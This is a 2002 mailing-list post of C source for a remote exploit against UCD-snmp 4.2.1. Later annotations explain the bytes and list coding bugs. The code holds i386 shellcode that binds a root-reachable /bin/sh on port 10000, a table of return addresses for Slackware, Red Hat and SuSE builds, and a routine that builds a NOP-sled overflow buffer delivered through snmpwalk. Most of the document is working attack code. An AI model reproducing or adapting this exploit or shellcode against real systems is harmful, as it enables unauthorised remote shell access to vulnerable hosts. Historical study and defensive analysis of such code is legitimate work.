UCD-snmp 4.2.1 exploit - proof of concept
From: zenparse () gmx net
Date: Tue, 19 Feb 2002 05:26:30 +0100 (MET)
/*
UCD-snmp 4.2.1 remote exploit
since this leaked, i have no reason to hold it from the
securityfocus infosec scene anymore... you need snmpwalk
in your local directory to make it work..
use ethically for penetration tests or other lucrative
activities only.
zen-parse
"revealing hacker secrets since 1998 - it takes a hacker
to protect you from a hacker"
greets: My man Brian McWilliams (The voice of the underground)
numacra, The metaray,DWalrus, JimJones AKA GOBBLES, Kimble (the man cant
keep you down big boy), The Shadow Knight(#shells won't be the same without
ya)...
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
/*
 * Raw i386 Linux payload kept as a C byte string; the mnemonic on each line
 * is the author's, and main() copies these bytes verbatim into its argument
 * buffer.  Reading notes for whoever analyses the sample:
 *  - 0x66 (102), 0x3f (63) and 0x0b (11) are i386 Linux syscall numbers
 *    (socketcall, dup2, execve).
 *  - the word 0x1027 stored at [ebp-18] sits in memory as 27 10, i.e.
 *    0x2710 = 10000 read in network byte order; that is the port named in
 *    usage(), and "4135" in the mnemonic is the same bytes read host-order.
 *  - the two pushed dwords are the bytes "n/sh" and "//bi", i.e. "//bin/sh".
 * sizeof(code) includes the trailing NUL; main() copies sizeof(code)-1 bytes.
 */
char code[] =
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x89\xe5" // mov ebp, esp
"\x99" // cdq
"\xb0\x66" // mov al, 102
"\x89\x5d\xfc" // mov [ebp-4], ebx
"\x43" // inc ebx
"\x89\x5d\xf8" // mov [ebp-8], ebx
"\x43" // inc ebx
"\x89\x5d\xf4" // mov [ebp-12], ebx
"\x4b" // dec ebx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\x45\xf4" // mov [ebp-12], eax
"\x43" // inc ebx
"\x66\x89\x5d\xec" // mov [ebp-20], bx
"\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135 (0x1027; see header note)
"\x89\x55\xf0" // mov [ebp-16], edx
"\x8d\x45\xec" // lea eax, [ebp-20]
"\x89\x45\xf8" // mov [ebp-8], eax
"\xc6\x45\xfc\x10" // mov [ebp-4], byte 16
"\xb2\x66" // mov dl, 102
"\x89\xd0" // mov eax, edx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\xd0" // mov eax, edx
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x43" // inc ebx
"\x89\xd0" // mov eax, edx
"\x99" // cdq
"\x89\x55\xf8" // mov [ebp-8], edx
"\x89\x55\xfc" // mov [ebp-4], edx
"\xcd\x80" // int 80h
"\x31\xc9" // xor ecx, ecx
"\x89\xc3" // mov ebx, eax
"\xb1\x03" // mov cl, 3
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop -7
"\x52" // push edx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh ("n/sh")
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh ("//bi")
"\x89\xe3" // mov ebx, esp
"\x52" // push edx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
/*
 * Per-target parameters read by main(): a label printed by usage(), the
 * 32-bit value main() writes into its buffer at byte positions psn1, psn2
 * and psn3, and the byte offset at which code[] is copied.  The NULL-name
 * entry is the loop sentinel used by usage().  Note that main()'s range
 * check on the -t value compares against sizeof(targets), which is the
 * table size in bytes, not its entry count, so that check does not confine
 * the index to the three real entries here.
 */
struct {
char *name;
unsigned long ret_addr;
int psn1;
int psn2;
int psn3;
int offset;
}
targets[] = {
{ "UCD-snmp 4.2.1, Slackware 7.0", 0xbfffc560, 148, 160, 164, 0},
{ "UCD-snmp 4.2.1, Redhat 6.2", 0x807dc64, 244, 240, 244, 4},
{ "UCD-snmp 4.2.1, Suse 7.2", 0xbfffc76c, 152,152,152,0},
{ NULL, 0}
};
/*
 * Print the banner, the option summary and the targets[] table to stderr,
 * then terminate the process.  p is argv[0].
 *
 * Notes: exit() is called without <stdlib.h> being included; the exit
 * status is 0 even though every caller reaches this on a usage error; and
 * two of the string literals below were wrapped across lines by the list
 * archive (a C string literal cannot span lines without a continuation),
 * so this listing does not compile exactly as shown.
 */
void usage(char *p)
{
int i;
fprintf(stderr,
"*************************************************************\n");
fprintf(stderr,
"*************************************************************\n");
/* literal split by the archive's line wrapping */
fprintf(stderr, " SNMP EXPLOITATION PROOF OF CONCEPT - ETHICAL USES
ONLY\n");
/* literal split by the archive's line wrapping */
fprintf(stderr, "usage: %s [-t type] [-p port] [-o offset] [-w path]
<host>\n", p);
fprintf(stderr, "-t: target number\n");
fprintf(stderr, "-p: port of snmp \n");
fprintf(stderr, "-o: offset\n");
fprintf(stderr, "-w: path to snmpwalk (default is cwd)\n\n");
fprintf(stderr, "Target Types:\n");
/* walk the table up to its NULL-name sentinel */
for(i = 0; targets[i].name; i++)
fprintf(stderr, "%d) %s\n", i, targets[i].name);
fprintf(stderr, "exploit opens shell on port 10000\n");
fprintf(stderr, "\n");
fprintf(stderr,
"*************************************************************\n");
fprintf(stderr,
"*************************************************************\n");
exit(0);
}
/*
 * Entry point.  Parses -t/-o/-p/-w, fills a 512-byte buffer from the
 * selected targets[] entry plus code[], and replaces this process with
 * "snmpwalk" resolved relative to the current working directory (as the
 * file header says), passing buf as the final argument.
 *
 * Review notes on the C itself, recorded here rather than changed:
 *  - exit(), atoi(), malloc(), memset(), memcpy(), strncpy() and strlen()
 *    are used with no <stdlib.h>/<string.h>; this relies on implicit
 *    declarations, which C99 and later reject.
 *  - case 't' has no break and falls through into case 'o'.
 *  - the local `offset` and the `path` allocation are never read again:
 *    the copy below uses targets[type].offset and execl() uses the literal
 *    "snmpwalk", so -o and -w have no effect.
 *  - malloc(sizeof(optarg)) allocates sizeof(char *) bytes, not the
 *    argument's length, and the following strncpy writes strlen(optarg)-1
 *    bytes into it with no terminator.
 *  - the -t range check uses sizeof(targets) (bytes), not the entry count.
 *  - `boo` is unused; the execl() failure return is not checked and main
 *    then falls off the end.
 */
int main(int argc, char **argv) {
char buf[512];
struct stat boo; /* never used */
char *host, *path;
int c, type=0, offset=0;
char port[6] = "161"; /* remaining bytes are zero, so port[5] stays NUL */
/* getopt() reports end of options as -1; EOF is -1 on common platforms */
while((c = getopt(argc, argv, "t:o:p:w:")) != EOF){
switch(c){
case 't':
type = atoi(optarg);
/* sizeof(targets) is the table size in bytes, not the number of entries */
if(type < 0 || type > sizeof(targets)){
fprintf(stderr, "invalid target type\n");
usage(argv[0]);
}
/* no break here: execution continues into case 'o' */
case 'o':
offset = atoi(optarg); /* assigned but never read below */
break;
case 'p':
strncpy(port, optarg, 5); /* at most 5 bytes; port[5] remains NUL */
break;
case 'w':
/* sizeof(optarg) is the size of a char *, not the string length */
path = (char *)malloc(sizeof(optarg));
strncpy(path, optarg, strlen(optarg)-1); /* path is never used afterwards */
break;
}
}
if(!argv[optind])
usage(argv[0]);
host = argv[optind];
/* 0x90 is the i386 NOP opcode; the first 256 bytes of buf become a NOP run */
memset(buf, 0x90, 256);
/* low 4 bytes of the table's unsigned long placed at three byte positions */
memcpy(buf+targets[type].psn1,(void *) &targets[type].ret_addr, 4);
memcpy(buf+targets[type].psn2,(void *) &targets[type].ret_addr, 4);
memcpy(buf+targets[type].psn3,(void *) &targets[type].ret_addr, 4);
buf[256] = 0x00; /* terminates the 256-byte run; buf is 512 bytes, so in bounds */
/* code[] minus its trailing NUL, copied at the table's offset */
memcpy(buf+targets[type].offset, code, sizeof(code)-1);
/* relative path: whatever "snmpwalk" sits in the cwd is executed; -w is ignored */
execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
}
